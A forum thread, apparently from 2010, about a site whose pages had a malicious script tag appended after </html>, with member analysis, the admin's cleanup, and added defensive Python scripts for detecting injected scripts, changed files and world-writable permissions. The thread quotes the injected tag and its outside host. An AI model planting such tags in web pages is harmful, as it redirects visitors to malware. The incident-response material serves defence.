My anti virus program keeps saying there's a virus here.

Started by Wario Bros, May 02, 2010, 11:37:17 AM


Wario Bros

When I get on these forums, my anti virus program keeps making a pop-up saying there is a virus threat called "HTML/ScrInject.B.Gen virus." I tell it to delete it but when I click on another section of the forums, that same warning message comes up. Is this just me or is it happening to someone else as well?

bustin98


marioman


Revned

Hmm. At the very end of every page, after the </html> tag, is the following:

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

which redirects to http://www3.workfree36-td.xorg.pl based on your cookies. This domain times out on me, so I can't tell what it is.

EDIT: The kdjkfjskdfjlskdjf.com site is timing out for me now, so every page on the forums tries to load forever.
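
An added illustration of the check Revned describes, not code posted by anyone in this thread: fetch the page as served (no JavaScript executed, as with wget) and flag any script tag that sits after the final </html>, plus any script host outside an allowlist. The sample page, the host forum.example.org and the allowlist are constructed for the demo; the kp.php URL is the one quoted above.

```python
# Added example: detect script tags appended after </html> and scripts from unexpected hosts.
import re
import sys
import urllib.request
from typing import Dict, List, Set
from urllib.parse import urlparse

# Matches <script ... src=URL ...> with or without quotes around the URL.
SCRIPT_SRC_RE = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)
HTML_CLOSE_RE = re.compile(r'</html\s*>', re.IGNORECASE)


def trailing_scripts(page: str) -> List[str]:
    """Return the src of every <script> found after the final </html>.

    A well-formed page puts nothing after </html>, so any hit here is the
    pattern described in the thread: a tag appended to the template after
    the real markup ends.
    """
    closes = list(HTML_CLOSE_RE.finditer(page))
    if not closes:
        return []
    return SCRIPT_SRC_RE.findall(page[closes[-1].end():])


def foreign_scripts(page: str, allowed_hosts: Set[str]) -> List[str]:
    """Return script srcs anywhere in the page whose host is not allowlisted.

    Relative srcs (same origin) carry no host and are treated as allowed.
    """
    hits = []
    for src in SCRIPT_SRC_RE.findall(page):
        host = urlparse(src).hostname
        if host and host.lower() not in allowed_hosts:
            hits.append(src)
    return hits


def scan_page(page: str, allowed_hosts: Set[str]) -> Dict[str, List[str]]:
    return {
        "after_html_close": trailing_scripts(page),
        "foreign_hosts": foreign_scripts(page, allowed_hosts),
    }


# Constructed sample: an ordinary forum page with the tag quoted in the thread
# appended after </html>. forum.example.org stands in for the site's own host.
SAMPLE_PAGE = """<!DOCTYPE html>
<html><head><title>Forum</title>
<script src="/Themes/default/scripts/script.js"></script>
<script src="http://forum.example.org/Themes/default/scripts/smf.js"></script>
</head><body><p>Hello</p></body></html>
<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>
"""

if __name__ == "__main__":
    # With a URL argument this fetches the raw HTML the way wget would (no
    # JavaScript executed), so a hit proves the tag is emitted server-side.
    if len(sys.argv) > 1:
        page = urllib.request.urlopen(sys.argv[1]).read().decode("utf-8", "replace")
    else:
        page = SAMPLE_PAGE
    for kind, srcs in scan_page(page, {"forum.example.org"}).items():
        print(f"{kind}: {srcs or 'none'}")
```

Running it against the constructed sample reports the kp.php tag under both headings; run against a live site, an empty "after_html_close" list for every page is the quick confirmation that the template is clean again.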

bustin98

Either my AntiVirus is disabling it or IE8 is. I am not having any issues with the site, but I do see the code. Working on it now. Seems like it is embedded in the code.

Revned

The script only does something the first time you view it. It adds a cookie, then sends you to the other site. From then on it sees that you have a cookie already and does nothing.

The real question is how this is happening in the first place. It's not being appended with JavaScript, because it's there even if I get the page with plain old wget. This sounds almost like they somehow edited the site's PHP source :-S


EDIT: Alright, everyone is safe. The site it redirects you to further redirects you to "QoogleSearch.com", which has been de-listed:

   Domain Name: QOOGLESEARCH.COM
   Registrar: GODADDY.COM, INC.
   Whois Server: whois.godaddy.com
   Referral URL: http://registrar.godaddy.com
   Name Server: NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
   Name Server: NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
   Status: ok
   Updated Date: 27-apr-2010
   Creation Date: 21-jan-2010
   Expiration Date: 21-jan-2011

Peardian

That's the infection I was talking about. And it looks like the script is still there at the bottom of the page. The site gives you a virus, or it did before it was shut down.
MM (10%) - SMA3 (33%) - DNS (0%)

Come check out the Nintendo 64 Mapping Workshop!

bustin98

I overwrote the source code with the original files, hence the current lack of ads at the footer. No luck in removing it though. Currently creating a new directory with a completely fresh install, importing the DB now.

EDIT: Ok, everything is switched over to a completely fresh install with the old DB imported in. Anyone see anything off? Let me know.

Wario Bros

That's good to hear!  BTW, I no longer get that virus message anymore.  I'm kinda surprised how fast this was handled.  :)

Revned

Did you save the infected files for further inspection? This might just happen again if you don't find the cause.

bustin98

Doesn't seem fast to me... 4 hours of trying stuff just to let it come down to a fresh install. Still will be looking at the old files to see if I can't find what was changed in case it happens again.

EDIT: We are thinking the same.
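
An added example, not code from anyone in this thread, of the comparison bustin98 is planning: hash every file in a pristine copy of the forum software and in the saved compromised web root, then list what was modified, added or removed. The demo trees, file names and the placeholder host are constructed; the real comparison would be run with the two directory paths as arguments.

```python
# Added example: find what changed between a pristine forum install and the saved compromised copy.
import hashlib
import os
import sys
import tempfile
from typing import Dict, List


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_digests(root: str) -> Dict[str, str]:
    """Map each file's path relative to root to its SHA-256."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            digests[os.path.relpath(full, root)] = sha256_file(full)
    return digests


def compare_digests(clean: Dict[str, str], suspect: Dict[str, str]) -> Dict[str, List[str]]:
    """Pure comparison of two digest maps, so it can be checked without a filesystem."""
    both = set(clean) & set(suspect)
    return {
        "modified": sorted(p for p in both if clean[p] != suspect[p]),  # edited templates/PHP
        "added": sorted(set(suspect) - set(clean)),                      # files only the suspect copy has
        "missing": sorted(set(clean) - set(suspect)),
    }


def compare_trees(clean_root: str, suspect_root: str) -> Dict[str, List[str]]:
    return compare_digests(tree_digests(clean_root), tree_digests(suspect_root))


def demo() -> Dict[str, List[str]]:
    """Constructed demo: two tiny trees, the second with an altered template and an extra file."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, suspect = os.path.join(tmp, "clean"), os.path.join(tmp, "suspect")
        for root in (clean, suspect):
            os.makedirs(os.path.join(root, "Themes", "default"))
            with open(os.path.join(root, "index.php"), "w") as f:
                f.write("<?php echo 'ok';\n")
            with open(os.path.join(root, "Themes", "default", "index.template.php"), "w") as f:
                f.write("</html>\n")
        # Tamper with the suspect copy in the way the thread describes (placeholder host).
        with open(os.path.join(suspect, "Themes", "default", "index.template.php"), "a") as f:
            f.write('<script src="http://placeholder.invalid/kp.php"></script>\n')
        with open(os.path.join(suspect, "extra.php"), "w") as f:
            f.write("<?php /* file not present in the clean install */\n")
        return compare_trees(clean, suspect)


if __name__ == "__main__":
    report = compare_trees(sys.argv[1], sys.argv[2]) if len(sys.argv) == 3 else demo()
    for kind, paths in report.items():
        print(kind, paths)
```

The "added" list is usually the most telling one: a template edit explains the injected tag, but a PHP file that the clean install never shipped is the thing that lets it come back after a restore.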

Maxim

If you have any files or directories that are world-writeable then other people on your shared server can drop files or add exploits. Also, any vulnerabilities in the forum will get you targeted, the best mitigation being to make some non-standard modifications (e.g. moving form fields around, hiding the version number) to make it harder to script and/or Google for.

(I've had to deal with these kinds of problems for a while... the only real solution is to run custom software, on a private server, and either not be big enough to get targeted or have really robust software. Also, daily backups of the files and DB.)
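
An added example, not code from Maxim or anyone else in the thread, of the first check in his post: walk a web root and report every world-writable file or directory, with the permission bits it should have instead (the same mode minus the other-write bit). It assumes Unix permissions; the demo tree and its file names are constructed. Anything the forum genuinely has to write to should be owned by the web server's user rather than opened to everyone on the host.

```python
# Added example: audit a web root for world-writable files and directories.
import os
import stat
import sys
import tempfile
from typing import Iterable, List, Tuple

Finding = Tuple[str, str, int]  # (relative path, kind, suggested permission bits)


def is_world_writable(mode: int) -> bool:
    return bool(mode & stat.S_IWOTH)


def classify(entries: Iterable[Tuple[str, int]]) -> List[Finding]:
    """Given (path, st_mode) pairs, return the world-writable files and directories.

    The suggested mode keeps everything except the other-write bit, so a 0o777
    directory becomes 0o775 and a 0o666 file becomes 0o664.
    """
    findings = []
    for path, mode in entries:
        if not is_world_writable(mode):
            continue
        if stat.S_ISDIR(mode):
            kind = "dir(sticky)" if mode & stat.S_ISVTX else "dir"
        elif stat.S_ISREG(mode):
            kind = "file"
        else:
            continue  # sockets, devices etc. are out of scope here
        findings.append((path, kind, stat.S_IMODE(mode & ~stat.S_IWOTH)))
    return findings


def walk_modes(root: str) -> Iterable[Tuple[str, int]]:
    """Yield (relative path, st_mode) for everything under root, skipping symlinks."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISLNK(st.st_mode):
                yield os.path.relpath(full, root), st.st_mode


def audit(root: str, fix: bool = False) -> List[Finding]:
    """Report world-writable entries under root; with fix=True also apply the suggested modes."""
    findings = sorted(classify(walk_modes(root)))
    if fix:
        for rel, _, new_mode in findings:
            os.chmod(os.path.join(root, rel), new_mode)
    return findings


def demo() -> List[Finding]:
    """Constructed demo: a tiny web root with one world-writable file and one directory."""
    with tempfile.TemporaryDirectory() as tmp:
        os.mkdir(os.path.join(tmp, "attachments"))
        os.chmod(os.path.join(tmp, "attachments"), 0o777)
        for name, mode in (("index.php", 0o644), ("Settings.php", 0o666)):
            with open(os.path.join(tmp, name), "w") as f:
                f.write("<?php\n")
            os.chmod(os.path.join(tmp, name), mode)
        return audit(tmp)


if __name__ == "__main__":
    for rel, kind, mode in (audit(sys.argv[1]) if len(sys.argv) > 1 else demo()):
        print(f"{kind:12} {rel}  -> chmod {mode:o}")
```

On a shared host the audit is worth repeating after every upgrade or plugin install, since installers often loosen permissions to make themselves work; the report alone is safe to run, and fix=True is there for when the findings have been looked at.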

Maxim

Also, some of the attachments/avatars have been corrupted. My avatar has had two bytes removed, for example.

bustin98

Sorry Maxim. It doesn't look like I can do anything about the avatars. You'll have to reload it back up.

Revned

Not that avatars are a chief concern, but don't you have backups? My avatar and several others' have disappeared, and it makes me concerned that other things might be corrupted.